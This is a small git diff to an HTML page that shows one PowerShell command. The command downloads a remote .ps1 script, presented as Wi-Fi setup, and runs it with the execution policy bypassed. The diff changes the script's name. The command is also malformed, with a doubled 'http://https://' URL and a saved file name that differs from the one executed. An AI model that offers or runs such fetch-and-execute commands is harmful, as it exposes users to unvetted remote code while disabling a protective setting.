--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@ p<!DOCTYPE html>
     <link rel="stylesheet" href="style.css">
   </head>
   <body>
-  <p>powershell -Command "Invoke-WebRequest -Uri http://https://iamerikpaz.github.io//setup.ps1 -OutFile C:\Temp\ConfigureWiFi.ps1; PowerShell -ExecutionPolicy Bypass -File C:\Temp\ConfigureWiFi.ps1"
+  <p>powershell -Command "Invoke-WebRequest -Uri http://https://iamerikpaz.github.io//WiFisetup.ps1 -OutFile C:\Temp\ConfigureWiFi.ps1; PowerShell -ExecutionPolicy Bypass -File C:\Temp\WiFisetup.ps1"
 </p>  
   </body>
 </html>
